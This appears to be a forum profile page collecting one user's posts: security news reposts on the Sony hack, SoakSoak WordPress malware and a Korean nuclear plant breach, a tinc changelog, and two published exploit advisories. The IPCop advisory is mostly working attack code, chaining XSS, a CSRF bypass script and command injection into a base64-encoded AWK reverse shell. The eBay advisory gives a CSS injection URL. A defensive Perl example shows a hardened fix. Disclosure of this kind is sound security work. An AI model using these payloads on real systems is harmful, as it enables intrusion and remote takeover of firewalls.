Everything posted by Aerosol
-
Sony was forced to pull the cinema release of "The Interview," scheduled for Christmas day, after hacker group Guardians of Peace (GOP) threatened to attack any theater that decided to show the film. But the studio will release the controversial North Korea-baiting film via different alternatives.

HACKERS WARNED OF TERROR ATTACK

The massive hacking attack against Sony Pictures Entertainment is getting worse day by day. The hack has so far exposed about 200 gigabytes of confidential data belonging to the company, from upcoming movie scripts to sensitive employee data, celebrities' phone numbers and their travel aliases, and also high-quality versions of 5 of its newest films, marking it as the most severe hack in history. A week back, the hacker group GOP, which has claimed responsibility for the damaging Sony cyber-attack, demanded that Sony cancel the release of "The Interview", the Seth Rogen and James Franco-starring comedy centered around a TV host and his producer assassinating North Korean dictator Kim Jong Un, citing terror threats against movie theatres. At the beginning of the month, when the GoP group sent a threatening email to Sony executives, they didn't even ask the company to cancel the release of The Interview. They never released any statement regarding the movie, but later, with the second hack, they actually demanded the same. It seems that the hackers got this tip from media suggestions and put all the blame on North Korea to make this drama more interesting.

PULLING THE INTERVIEW – A VERY COWARDLY ACTION

Not just GOP: the studio has been threatened by a number of hacker groups, including a group identifying itself as Anonymous. In a statement on Monday to Sony Entertainment CEO Michael Lynton, the hacker group warned the studio to release "The Interview" as originally planned, or else face more damaging hacks. The Anonymous group also denies that the Sony hackers are linked to North Korea, despite the FBI's revelation Friday that its probe had determined as much. The group criticized Sony for pulling the movie, saying it was a "very cowardly" act of both the CEO and the organization, alleging it showed "panicking at first sight of trouble." In fact, President Barack Obama also expressed disappointment in Sony's decision to pull the film and announced Friday that the studio had made "a mistake" by withdrawing the movie, but said it was the private company's right to do so.

SONY INTENDS TO RELEASE THE INTERVIEW

In response, Michael Lynton, the studio's chief executive, said that it had "not caved" to the hackers who harmed the company, that the studio itself intends to release its controversial film, and that it is exploring ways to let audiences see the film, possibly via YouTube.

BITTORRENT CAME UP WITH A GOOD IDEA

Meanwhile, the popular file-sharing giant BitTorrent has suggested to Sony a way to release the controversial film using its new alternative digital-distribution paygate for artists, BitTorrent Bundle, a paid service. The San Francisco-based company believes BitTorrent Bundle is the best way to satisfy both online downloaders and Sony's desire to release the film. According to BitTorrent, it's a totally "safe and legal way" for Sony to release "The Interview", with up to 20,000 creators and rights holders currently using the publishing platform. Notably, BitTorrent Bundle had released "The Act Of Killing," a 2012 Oscar-nominated documentary account of mass murder in 1960s Indonesia that stirred controversy for criticizing government officials. The feature was downloaded over 3.5 million times.

Now, let's wait and watch what Sony decides about the BitTorrent offer, but it is very clear that the studio has never been a fan of torrents, and if the company accepts the offer from the file-sharing giant then it would be an unlikely deal. But this deal sounds to be a convenient one both for Sony and viewers. Source
-
The attackers behind the SoakSoak malware campaign are continuing to modify their tactics and have infected a new group of Web sites. The Javascript code that the attackers target with the malware has also changed.

Last week, Google took the step of blacklisting thousands of sites that had been infected by SoakSoak. The malware is targeting WordPress sites and the attackers can inject their malicious code into various Javascript files. Originally, the attackers were targeting wp-includes/template-loader.php, and once the file is modified, the attackers' Javascript can appear on every page on an infected site. That code will then download malware from a remote domain.

The attackers have now begun targeting a different file, wp-includes/js/json2.min.js, which is being modified to load a malicious Flash file.

"The hidden iFrame URL in swfobjct.swf now depends on another script from hxxp://ads .akeemdom . com/db26, also loaded by malware in json2.min.js," researchers at Sucuri wrote in an analysis of the attack.

The SoakSoak malware campaign is targeting older versions of a popular WordPress plugin called RevSlider. Versions prior to 4.2 are being exploited, Denis Sinegubko of Sucuri said. The vulnerability in the plugin was disclosed several months ago and was discussed on underground forums.

"The biggest issue is that the RevSlider plugin is a premium plugin, it's not something everyone can easily upgrade and that in itself becomes a disaster for website owner. Some website owners don't even know they have it as it's been packaged and bundled into their themes," Daniel Cid of Sucuri wrote last week.

The vulnerability was patched silently by the plugin's developers, but sites that have not been updated are still vulnerable to these kinds of attacks. Source
-
tinc is a Virtual Private Network (VPN) daemon that uses tunneling and encryption to create a secure private network between multiple hosts on the Internet. This tunneling allows VPN sites to share information with each other over the Internet without exposing any information.

Changes:
- Documentation updates.
- Support linking against -lresolv on Mac OS X.
- Fixed scripts on Windows when using the ScriptsInterpreter option.
- Allowed a minimum reconnect timeout to be specified.
- Added support for PriorityInheritance on IPv6 sockets.

Download
-
######################################################################
# Exploit Title: IPCop <= 2.1.4 XSS to CSRF to Remote Command Execution
# Date: 21/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ipcop.org - www.ipcop.org/download.php
# Version: 2.1.4
# Category: Remote Command Execution
# Google dork:
# Tested on: IPCop distribution
######################################################################

IPCop firewall/router distribution description :
======================================================================
IPCop is a Linux distribution which aims to provide a simple-to-manage firewall appliance based on PC hardware. IPCop is a stateful firewall built on the Linux netfilter framework. Originally a fork of the SmoothWall Linux firewall, the projects are developed independently, and have now diverged significantly. IPCop includes a simple, user-managed update mechanism to install security updates when required.

In version <= 2.1.4 of the distribution, different vulnerabilities can be used to gain Remote Command Execution (reverse shell). In version <= 2.1.2 of the distribution, a Reflected XSS is available. Through this RXSS, the full reverse shell can be obtained with only one URL.

Proof of Concept 1 :
======================================================================
A non-persistent XSS in a GET param is available in ipinfo.cgi. The injection can be URL-encoded with certain browsers. This XSS works on IE and affects IPCop version <= 2.1.2 (patched in the 2.1.3 upgrade).

File /home/httpd/cgi-bin/ipinfo.cgi line 82 :

    &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);

PoC:

    https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script>

Proof of Concept 2 :
======================================================================
CSRF protection bypass from the previous XSS. IPCop is protected against CSRF attacks with a Referer check on all pages. It's possible to bypass this protection with the XSS detailed previously. To do this, load a third-party JS script with the XSS, and make Ajax requests in the IPCop context (so with the right Referer). This XSS works on IE and affects IPCop version <= 2.1.2 (patched in the 2.1.3 upgrade).

File /home/httpd/cgi-bin/ipinfo.cgi line 82 :

    &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);

PoC :
Host a third-party JS script on a web server accessible from IPCop. In this JS script, load jQuery dynamically and perform any AJAX request to a targeted IPCop page. All AJAX requests bypass the CSRF protection.

* Third-party JS script, hosted at http://<PENTESTER_WEBSITE>/x.js:

    var headx=document.getElementsByTagName('head')[0];
    var jq= document.createElement('script');
    jq.type= 'text/javascript';
    jq.src= 'http://code.jquery.com/jquery-latest.min.js';
    headx.appendChild(jq); // jquery dynamic loading
    function loadX(){
        $.ajax({
            type: 'POST',
            url: "https://<IPCop_IP>:8443/cgi-bin/<TARGETED_PAGE>",
            contentType: 'application/x-www-form-urlencoded;charset=utf-8',
            dataType: 'text',
            data: '<YOUR_DATA>'
        }); // payload of your choice
    }
    setTimeout("loadX()",2000);

* XSS to load this third-party script dynamically :

    var head=document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://<PENTESTER_WEBSITE>/x.js';head.appendChild(script);

* Escape this string with the escape() JavaScript method :

    %76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09

* Make the final URL with the XSS in the GET param that dynamically loads the third-party script (IE) :

    https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09"))</script>

Proof of Concept 3 :
======================================================================
Remote Command Execution in the iptablesgui.cgi file. This file is protected from CSRF execution. Affected version <= 2.1.4 (patched in the 2.1.5 upgrade).

File /home/httpd/cgi-bin/iptablesgui.cgi line 99 (and also 102) :

    $output = `/usr/local/bin/iptableswrapper $cgiparams{'TABLE'} 2>&1`;

$cgiparams{'TABLE'} isn't sanitized before execution on the command line. It's possible to change the "TABLE" POST data to arbitrary data. To chain commands in this instruction, only || is usable (not && nor . So the first part of the command needs to return a false status. It can be done with no additional param :

    /usr/local/bin/iptableswrapper <NOTHING HERE> || <my personal command will be executed here>

So the RCE can be exploited with this PoC (if the Referer is set to the IPCop URL) :

    <html>
    <body>
    <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
    <input type='hidden' name='TABLE' value='||touch /tmp/x;#' />
    <input type='hidden' name='CHAIN' value='' />
    <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
    </form>
    <script>document.forms['x'].submit();</script>
    </body>
    </html>

Note that the ACTION POST param depends on the IPCop language defined.

Proof of Concept 4 :
======================================================================
Finally, with these three previous PoCs, it's possible to combine all the mechanisms to gain a full reverse shell on IPCop. IPCop does not have netcat, telnet, socat, python, ruby, php etc. The only way to make a reverse shell is to use Perl or AWK techniques. In this PoC, the AWK technique is used (from the ASafety reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/).

* The one-line reverse shell with AWK is :

    awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

* To bypass the IPCop filter, you need to encode this command in base64 (after modifying <IP> and <PORT>) :

    YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsgfX0nIC9kZXYvbnVsbA==

* Place a \n at each block of 64 chars in the base64 version :

    YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==

* This payload can be echo'ed and decoded with openssl, on the fly, on IPCop :

    echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d

* To execute this payload, add backticks and an eval call :

    eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`

* Your payload is ready to be used in the TABLE POST param of iptablesgui.cgi, like the previous PoC :

    ||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#

* Full PoC (IPCop <= 2.1.2, RXSS patched in the 2.1.3 upgrade but RCE available up to 2.1.4, patched in the 2.1.5 upgrade) (if the Referer is set to the IPCop URL, and a netcat is listening: # nc -l -vv -p 1337) :

    <html>
    <body>
    <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
    <input type='hidden' name='TABLE' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#' />
    <input type='hidden' name='CHAIN' value='' />
    <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
    </form>
    <script>document.forms['x'].submit();</script>
    </body>
    </html>

Note that no <IP>/<Port> are defined in the previous payload; you need to reproduce these different steps.

* With the XSS method to bypass the CSRF Referer check, the third-party JS script can be :

    var headx=document.getElementsByTagName('head')[0];
    var jq= document.createElement('script');
    jq.type= 'text/javascript';
    jq.src= 'http://code.jquery.com/jquery-latest.min.js';
    headx.appendChild(jq);
    function loadX(){
        $.ajax({
            type: 'POST',
            url: "https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi",
            contentType: 'application/x-www-form-urlencoded;charset=utf-8',
            dataType: 'text',
            data: 'CHAIN=&ACTION=Rafra%C3%AEchir&TABLE=%7C%7Ceval+%60echo+-e+%22YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA%22%22+%7C+openssl+enc+-a+-d%60%3B%23'
        });
    }
    setTimeout("loadX()",2000);

* A demonstration video has been made as PoC here (IPCop 2.0.6, but it works on IPCop 2.1.2) : https://www.youtube.com/watch?v=ovhogZGHyMg

Solution:
======================================================================
- To patch the RXSS, install IPCop >= 2.1.3 or upgrade to 2.1.3.
- To patch the RCE, install IPCop >= 2.1.5 or upgrade to 2.1.5.

Report timeline :
======================================================================
2013-03-31 : Team alerted with details, PoC and video (via Sourceforge)
2013-04-09 : Second alert sent to the team (via Sourceforge)
2013-04-25 : Third alert sent to the IPCop English support forum
2013-04-25 : PoC added in private on the Sourceforge bug tracker, no response
2013-04-30 : Ticket priority changed from 5 to 8, no response.
2014-02-13 : IPCop 2.1.1 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-03-03 : IPCop 2.1.2 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-04-03 : IPCop 2.1.3 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-04-08 : IPCop 2.1.4 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-05-02 : IPCop 2.1.5 released, RXSS fixed, RCE fixed, no news on ticket.
2014-12-21 : Public article on ASafety and public advisory

Additional resources :
======================================================================
- www.ipcop.org
- sourceforge.net/p/ipcop/bugs/807/
- sourceforge.net/projects/ipcop/
- www.synetis.com
- www.asafety.fr
- www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution
- www.youtube.com/watch?v=ovhogZGHyMg

Credits :
======================================================================
www.synetis.com - Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr
Source
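An added example (mine, not IPCop's code nor the advisory author's): the unsanitized backtick call quoted from iptablesgui.cgi in Proof of Concept 3, beside a hardened form that checks TABLE against the four iptables table names and launches the wrapper with Perl's list-form open(), which never goes through /bin/sh, so the `||` chaining the advisory relies on has no shell to reach. The wrapper path is the advisory's; the allowlist of table names is an assumption about what the page legitimately accepts.

```perl
#!/usr/bin/perl
# Added example, not IPCop's code: the backtick call quoted from
# iptablesgui.cgi (PoC 3) next to a hardened replacement.
use strict;
use warnings;

# Wrapper path as named in the advisory. The allowlist is an assumption:
# the four standard iptables tables are the only values the page should accept.
my $WRAPPER = '/usr/local/bin/iptableswrapper';
my %ALLOWED_TABLE = (filter => 1, nat => 1, mangle => 1, raw => 1);

# Pure validation step, reusable by the CGI and by tests.
sub table_is_valid {
    my ($table) = @_;
    return (defined $table && exists $ALLOWED_TABLE{$table}) ? 1 : 0;
}

# Vulnerable pattern: the CGI parameter is interpolated into a string that
# Perl hands to /bin/sh, so a value such as "||touch /tmp/x;#" is parsed
# by the shell as a second command, exactly as the advisory describes.
sub run_vulnerable {
    my ($table) = @_;
    my $output = `$WRAPPER $table 2>&1`;
    return $output;
}

# Hardened version:
#  1. refuse anything that is not a known table name (the primary control);
#  2. start the wrapper with the multi-argument form of open(), which
#     fork()s and exec()s the program directly, without a shell, so no
#     metacharacter in $table can be interpreted even if step 1 were bypassed.
# Only stdout is captured here; the original's "2>&1" merged stderr as well.
sub run_hardened {
    my ($table) = @_;
    die "TABLE must be one of: " . join(', ', sort keys %ALLOWED_TABLE) . "\n"
        unless table_is_valid($table);
    open(my $fh, '-|', $WRAPPER, $table)
        or die "cannot run $WRAPPER: $!\n";
    my $output = do { local $/; <$fh> };
    close($fh);
    return $output;
}

# Constructed inputs: the first is legitimate, the second is the advisory's
# PoC value, the others are further shapes an allowlist rejects.
for my $candidate ('filter', '||touch /tmp/x;#', 'nat; id', '') {
    printf "%-22s -> %s\n", "'$candidate'",
        table_is_valid($candidate) ? 'accepted' : 'rejected';
}
```

The same allowlist-then-exec pattern applies to the CHAIN parameter; the Referer check the advisory bypasses via XSS is not a substitute for either.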
-
######################################################################
# Exploit Title: eBay.com ocsnext sub-domain Reflected CSS injection
# Date: 20/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ebay.com
# Version: /
# Category: Reflected CSS injection
# Google dork:
# Tested on: eBay.com ocsnext sub-domain
######################################################################

Adobe description :
======================================================================
eBay Inc. is an American multinational corporation and e-commerce company, providing consumer-to-consumer and business-to-consumer sales services via the Internet. It is headquartered in San Jose, California, United States. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide.

Vulnerability description :
======================================================================
A CSS injection is available in the ocsnext.ebay.com sub-domain. Through this vulnerability, an attacker could tamper with page rendering, and potentially inject JavaScript to generate a Reflected XSS (RXSS) to redirect victims to fake eBay portals, or capture eBay users' credentials such as cookies. This CSS injection is in the GET "query" variable, which is not properly sanitized before being used in the page.

Proof of Concept 1 :
======================================================================
A non-persistent CSS injection and potentially RXSS in the "query" GET param is available in the ocsnext.ebay.com sub-domain. Tested with Firefox 30.0 and Chrome 36.0.1985.125. Using eBay's services, the injection (HTML, CSS and potentially JavaScript) affects a page of the ocsnext.ebay.com domain (*.ebay.com) once authenticated. The injection is used to define arbitrary attributes on an input tag of type "hidden":

    <input type="hidden" name="query" value="[INJECTION]" />

It is possible to define the "style" attribute to load CSS on the fly and possibly achieve XSS depending on browsers and their versions (-moz-binding, expression(), background-image: url(javascript:)) ... Chars like "<" or ">" are encoded, and strings like "http://" are filtered. To evade the "http://" filter, the evasion vector "http:/%26%23x0D%3B/" is used.

PoC:

    http://ocsnext.ebay.com/ocs/cusr?query=x" style="background-image:url('http:/%26%23x0D%3B/www.asafety.fr/images/logo.png')&domain=TechnicalIssues&from=404_error

Screenshots :
======================================================================
- http://www.asafety.fr/data/20140721-ebay_css_injection_01.png

Solution:
======================================================================
Fixed by the eBay / PayPal / Magento security team.

Additional resources :
======================================================================
- http://www.ebay.com/
- http://ebay.com/securitycenter/ResearchersAcknowledgement.html
- http://www.asafety.fr/vuln-exploit-poc/contribution-ebay-css-injection-xss-potentielle/
- http://www.synetis.com/2014/08/22/contribution-securite-debay/

Report timeline :
======================================================================
2014-07-21 : eBay Team alerted with details and PoC.
2014-07-21 : eBay response and ack.
2014-07-21 : eBay validated the issue and awaiting fix.
2014-08-21 : eBay fixed the issue and acknowledgement
2014-08-22 : Public article on SYNETIS website.
2014-12-20 : Public article and PoC on ASafety website
2014-12-20 : Public advisory

Credits :
======================================================================
www.synetis.com - Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr
Source
-
A good hacker is one who doesn't advertise himself (i.e. he stays underground). A good hacker is not the one who breaks into many sites; a good hacker is the one who protects himself!
-
The wonderful and terrifying thing about the security world is that things never stay calm for long. As soon as you think you have a chance to catch your breath, someone breaks something and it's time to scramble again. In 2014, those small moments of downtime were hard to come by. There was a seemingly endless parade of major vulnerabilities, data breaches and high-profile hacks. It was a year filled with Heartbleeds, POODLEs, Shellshock and a lot of pain for users, administrators and anyone else who likes to do things on the Interweb. Thankfully, the network is still standing after all that, so we went back and looked at all the stories we did this year and picked out the 10 most popular ones, put a fresh coat of paint on them and put them together to give you a picture of the year that was in security. Enjoy.

PNG Image Metadata Leading to iFrame Injections

If there's one thing attackers love, it's Javascript. It's the gift that keeps on giving and in 2014 one of the presents it gave us was the ability to deliver malware through the use of the metadata in an obfuscated PNG image file. Researchers at Sucuri discovered that some attackers were using the technique to trigger an iframe that calls the image's metadata, which is outside the browser's viewing area. The browser can still read the data though and it can be used in drive-by downloads and other attacks. Easy workaround: Don't look at pictures on the Internet.

Seriousness of OpenSSL Heartbleed Bug Sets In

As Code Red once was the standard for Internet worms, Heartbleed has become the bar to which other Internet-wide bugs must now aspire. The vulnerability in the heartbeat extension of OpenSSL caused Web-wide panic when it was disclosed in April and its effects are still being felt eight months later. OpenSSL is deployed in an untold number of products, and the bug affects both clients and servers, so attackers had a Cheesecake Factory menu of targets at their disposal. Rumors of Heartbleed's discovery by the NSA appear to be exaggerated, but the bug can be blamed for starting the vulnerability-as-celebrity trend. So, thanks, Heartbleed.

Major Bash Vulnerability Affects Linux, UNIX, Mac OS X

These are not words you want to hear when a new vulnerability is disclosed: "It's super simple and...It's extremely serious." That's how a security engineer at Red Hat described the Shellshock flaw in the Bash command line tool, a bug that affected Unix, Linux and OS X and allows attackers to execute whatever code they want on target systems. Which, as it turns out, is undesirable. Vendors scrambled to patch their products, while hackers did what they do: hack. Shellshock also carried on the proud tradition of vulnerability branding and logo production.

Browser Vendors Move to Disable SSLv3 in Wake of POODLE Attack

2014 was not a great year for SSL. And by not great, we mean terrible. Really, really terrible. As if the Heartbleed bug wasn't enough, in October researchers from Google revealed a new attack on SSLv3 that could let attackers decrypt secure connections in some circumstances. In response to the disclosure, browser vendors have begun disabling SSLv3 support, a move that was long overdue. The protocol is older than half the kids trying to exploit it using POODLE. But news came out recently that TLS, the replacement for SSL, is also vulnerable to the attack in some implementations. But the good news is, well, nothing.

Hacker Puts Hosting Service Code Spaces Out of Business

Most high-profile attacks these days result in data being stolen and sometimes leaked online (see: Sony). But in June we saw an attack on Code Spaces, a hosting and collaboration platform provider, that forced the company to go out of business. The company was hit with a DDoS attack that was quickly followed by a compromise of its Amazon EC2 control panel. The hackers destroyed the company's data, including its backups, and Code Spaces informed customers within a few hours that it was going to cease operations. This kind of devastating attack is a rarity, but not unique.

Researcher Finds Tor Exit Node Adding Malware to Binaries

Tor has become a safe haven for people eager to protect the privacy of their online activities. In turn, hackers have taken to Tor not only to carry out DDoS and spam campaigns, but also to load malware on unsuspecting users' machines. Security researcher Josh Pitts in October identified a Tor exit node that was surreptitiously adding malware to binaries users downloaded using the Tor browser. The exit node was subsequently flagged by the Tor Project, but not before it infected machines with code that opened ports listening for commands and sent HTTP requests to a remote server.

The Internet is Broken, Act Accordingly

Now that the curtain has been thrown back on the depth and breadth of government surveillance of Internet activities, the time has come to heed some cautious advice: Behave online as if someone is monitoring you, because they are. Security researchers are particularly aware of this dynamic because their work is of keen interest to intelligence outfits, hackers and defenders, all of whom would like to know what they know. No one can afford to be complacent or indifferent to Internet threats, whether they're state-sponsored or criminally motivated. As Kaspersky Lab senior researcher Costin Raiu advises: The Internet is broken, act accordingly.

Passcode Bypass Bug and Email Attachment Encryption Plague iOS 7.1.1

An Egyptian neurosurgeon and self-proclaimed baseband hacker disclosed the details of an iPhone lockscreen bypass technique that allows an attacker in physical possession of an Apple iPhone 5 device running iOS 7.1.1 at the time to access contacts and make phone calls. The vulnerability allows an attacker to bypass not only the lockscreen, but also the new TouchID fingerprint sensor that arrived with the latest iPhones. The trick to beating these protections is to use the device's voice-recognition program Siri, which after some prompting presented the good doctor with the ability to scroll through contacts. The Siri bug was a double whammy for Apple, which also had to deal with a separate issue in iOS 7.1.1 that prevented email attachments from being properly encrypted. Both issues were patched.

UltraDNS Dealing With DDoS Attack

Big DNS service provider UltraDNS in April was put on its heels having to beat back a DDoS attack that kept many of its customers offline. It was a hectic day for website operators who relied on UltraDNS' services. Ultimately, it turned out that a massive 100 Gbps DDoS attack against one of UltraDNS' customers resulted in latency issues for others. The attack against UltraDNS was just the latest volumetric DDoS attack to be reported. Attacks ranging between 70 Gbps and more than 400 Gbps were happening with greater frequency against high value financial targets, as well as core infrastructure providers such as UltraDNS. Many such DNS amplification attacks take advantage of the millions of open DNS resolvers listening online to amplify traffic exponentially, spoofing requests to the intended target. UltraDNS mitigated its situation within hours.

Audit Project Releases Verified Repositories of TrueCrypt 7.1A

In a year of bizarre stories, hacks and Internet-wide vulnerabilities, there may not have been a stranger story than the abrupt shutdown in May of TrueCrypt, the popular open source encryption software package. TrueCrypt's maintainers' decision to shut down the project kicked off speculation about whether the software had been hacked or infiltrated by the National Security Agency. In an attempt to get some answers, the Open Crypto Audit Project was formed with the express mission of auditing the TrueCrypt code looking for a backdoor. In June, OCAP posted a verified repository of TrueCrypt 7.1a, the last known good TrueCrypt archive. The experts involved in the project created the verified repository by comparing the SHA2 hashes with files found in other TrueCrypt repositories, ensuring their integrity. Source
-
@MrGrj with this post you did nothing but give those losers satisfaction (they get to feel like somebody too); people like that should not be given any attention!
-
Computers at a nuclear power plant in South Korea have been compromised by a hacker, but the plant's operator says no critical data has been leaked. The hacker was able to access blueprints, floor maps and other information on the plant, the South Korean Yonhap News Agency reported Sunday. Using a Twitter account called "president of anti-nuclear reactor group," the hacker has released a total of four postings of the leaked data since December 15, each one revealing internal designs and manuals of the Gori-2 and Wolsong-1 nuclear reactors run by Korea Hydro and Nuclear Power Co. (KHNP), Yonhap added. The hacker has threatened to leak further information unless the reactors are shut down.

KHNP has insisted that the leaked information is not critical and does not undermine the safety of the reactors. The company also played down the threat of any type of cyberattack, saying that the reactors' controllers are protected because they're not linked to any external networks, according to the Wall Street Journal.

The hacking against KHNP nuclear plants occurs in the midst of a major hack against Sony Pictures over its movie "The Interview," a comedy about an assassination attempt against North Korean leader Kim Jong-un. The FBI has accused North Korea of orchestrating the Sony hack, though the country has denied any involvement. As a further response, North Korea suggested a joint investigation into the hack with the US but then accused the US of being involved in the making of the film, according to The Guardian.

Despite the increased tension, no fingers have been pointed at North Korea for the hacking against the KHNP power plants. An official at KHNP told Reuters that the hacking appeared to be the work of "elements who want to cause social unrest," but added that he had no one specific in mind. Government officials looking into the incident were able to trace the hacker's IP address to a PC located in a specific location, Yonhap said. Investigators have been sent to the location as well as to the plant's reactors to probe further. Source
-
